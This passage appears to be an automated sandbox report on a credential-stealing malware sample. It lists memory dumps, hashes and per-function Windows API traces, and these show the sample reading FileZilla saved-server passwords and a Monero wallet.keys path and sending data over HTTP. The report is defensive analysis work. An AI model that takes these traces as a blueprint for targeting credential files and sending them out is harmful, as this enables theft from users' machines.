                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 612f6c062c6b2a5ce4505d2e2685992d77310bde7e2033413f84cdcb4bf568e8
                                • Instruction ID: 7ee423bc71714a10ada2503b9b4006bcd32626e420c90033316bf4e4c6241cda
                                • Opcode Fuzzy Hash: 612f6c062c6b2a5ce4505d2e2685992d77310bde7e2033413f84cdcb4bf568e8
                                • Instruction Fuzzy Hash: B9316BB290C3149FE705BF29DC857AAFBE5FF98310F02892DDBC483654D63468548A87
                                Function 00EE75A8 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                Function 00EB9AA0 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00EB03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00EC0DBF,00EC0DBE,00EC0DBB,00EC0DBA), ref: 00EB04C2
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB04C9
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EB04E5
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB04F3
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EB052F
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB053D
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00EB0579
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB0587
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EB05C3
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB05D5
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB0662
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB067A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB0692
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB06AA
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EB06C2
                                • lstrcat.KERNEL32(?,profile: null), ref: 00EB06D1
                                • lstrcat.KERNEL32(?,url: ), ref: 00EB06E0
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB06F3
                                • lstrcat.KERNEL32(?,00EC1770), ref: 00EB0702
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB0715
                                • lstrcat.KERNEL32(?,00EC1774), ref: 00EB0724
                                • lstrcat.KERNEL32(?,login: ), ref: 00EB0733
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB0746
                                • lstrcat.KERNEL32(?,00EC1780), ref: 00EB0755
                                • lstrcat.KERNEL32(?,password: ), ref: 00EB0764
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB0777
                                • lstrcat.KERNEL32(?,00EC1790), ref: 00EB0786
                                • lstrcat.KERNEL32(?,00EC1794), ref: 00EB0795
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB07EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: dab3e7e4478b05f4a9dca19830581bf78ebd9bb1c7ea27774b5613588a56ef21
                                • Instruction ID: ebe9f6f0eabe004af82ce0689a893f267b3d8ebcd1afd5472e0fdb39aba406ad
                                • Opcode Fuzzy Hash: dab3e7e4478b05f4a9dca19830581bf78ebd9bb1c7ea27774b5613588a56ef21
                                • Instruction Fuzzy Hash: 39D16171910208ABCF14EBF0DD9AEEFB779AF14300F449568F112B6195EF31AA45CB61
                                Function 00EA59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EA5A48
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA5A63
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA5BE3
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01BFF840,00000000,?,01BFB5B0,00000000,?,00EC1B4C), ref: 00EA5EC1
                                • lstrlen.KERNEL32(00000000), ref: 00EA5ED2
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EA5EE3
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA5EEA
                                • lstrlen.KERNEL32(00000000), ref: 00EA5EFF
                                • lstrlen.KERNEL32(00000000), ref: 00EA5F28
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EA5F41
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00EA5F6B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EA5F7F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EA5F9C
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6000
                                • InternetCloseHandle.WININET(00000000), ref: 00EA600D
                                • HttpOpenRequestA.WININET(00000000,01BFF830,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA5C48
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6017
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: c3388cf8845900d15018f7969f16d72e239b84defba69582c50a92d8b7e421b0
                                • Instruction ID: 16e0f5b65fae6457b07ddb60661a6fe10d1c30739f4323689bd2cd8e37d82554
                                • Opcode Fuzzy Hash: c3388cf8845900d15018f7969f16d72e239b84defba69582c50a92d8b7e421b0
                                • Instruction Fuzzy Hash: 4612FC71920118ABCF15EBA0DDA6FEEB3B9AF14700F4455B9F11672191EF302A48CF61
                                Function 00EACFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAD083
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EAD1C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EAD1CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD308
                                • lstrcat.KERNEL32(?,00EC1570), ref: 00EAD317
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD32A
                                • lstrcat.KERNEL32(?,00EC1574), ref: 00EAD339
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD34C
                                • lstrcat.KERNEL32(?,00EC1578), ref: 00EAD35B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD36E
                                • lstrcat.KERNEL32(?,00EC157C), ref: 00EAD37D
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD390
                                • lstrcat.KERNEL32(?,00EC1580), ref: 00EAD39F
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD3B2
                                • lstrcat.KERNEL32(?,00EC1584), ref: 00EAD3C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD3D4
                                • lstrcat.KERNEL32(?,00EC1588), ref: 00EAD3E3
                                  • Part of subcall function 00EBAB30: lstrlen.KERNEL32(UO,?,?,00EA4F55,00EC0DDF), ref: 00EBAB3B
                                  • Part of subcall function 00EBAB30: lstrcpy.KERNEL32(00EC0DDF,00000000), ref: 00EBAB95
                                • lstrlen.KERNEL32(?), ref: 00EAD42A
                                • lstrlen.KERNEL32(?), ref: 00EAD439
                                  • Part of subcall function 00EBAD80: StrCmpCA.SHLWAPI(00000000,00EC1568,00EAD2A2,00EC1568,00000000), ref: 00EBAD9F
                                • DeleteFileA.KERNEL32(00000000), ref: 00EAD4B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 2d78cb46961b9db6ccd27d733949ea442c721097984b5ed4bd8b04f0e3346eb8
                                • Instruction ID: b0981c42cab75629d6f81b96a269ea2b81424afda7b240205c33aa5112660202
                                • Opcode Fuzzy Hash: 2d78cb46961b9db6ccd27d733949ea442c721097984b5ed4bd8b04f0e3346eb8
                                • Instruction Fuzzy Hash: A6E11E71910108ABCF18EBA0DD96EEF73B9AF54301F1455B8F127B6191DF31AA48CB62
                                Function 00EACA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01BFE408,00000000,?,00EC1544,00000000,?,?), ref: 00EACB6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00EACB89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00EACB95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EACBA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EACBD9
                                • StrStrA.SHLWAPI(?,01BFE378,00EC0B56), ref: 00EACBF7
                                • StrStrA.SHLWAPI(00000000,01BFE4E0), ref: 00EACC1E
                                • StrStrA.SHLWAPI(?,01BFE620,00000000,?,00EC1550,00000000,?,00000000,00000000,?,01BF9D48,00000000,?,00EC154C,00000000,?), ref: 00EACDA2
                                • StrStrA.SHLWAPI(00000000,01BFE960), ref: 00EACDB9
                                  • Part of subcall function 00EAC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EAC971
                                  • Part of subcall function 00EAC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EAC97C
                                • StrStrA.SHLWAPI(?,01BFE960,00000000,?,00EC1554,00000000,?,00000000,01BF9E58), ref: 00EACE5A
                                • StrStrA.SHLWAPI(00000000,01BF9F38), ref: 00EACE71
                                  • Part of subcall function 00EAC920: lstrcat.KERNEL32(?,00EC0B47), ref: 00EACA43
                                  • Part of subcall function 00EAC920: lstrcat.KERNEL32(?,00EC0B4B), ref: 00EACA57
                                  • Part of subcall function 00EAC920: lstrcat.KERNEL32(?,00EC0B4E), ref: 00EACA78
                                • lstrlen.KERNEL32(00000000), ref: 00EACF44
                                • CloseHandle.KERNEL32(00000000), ref: 00EACF9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: d3529ebbdd51fbcf344bcee94f3eb4165767975e368291b2b3f8f529c21d98ab
                                • Instruction ID: 3f003288d0440d76264c2ebc406583a6959adc6307889de340d115c697d09c4e
                                • Opcode Fuzzy Hash: d3529ebbdd51fbcf344bcee94f3eb4165767975e368291b2b3f8f529c21d98ab
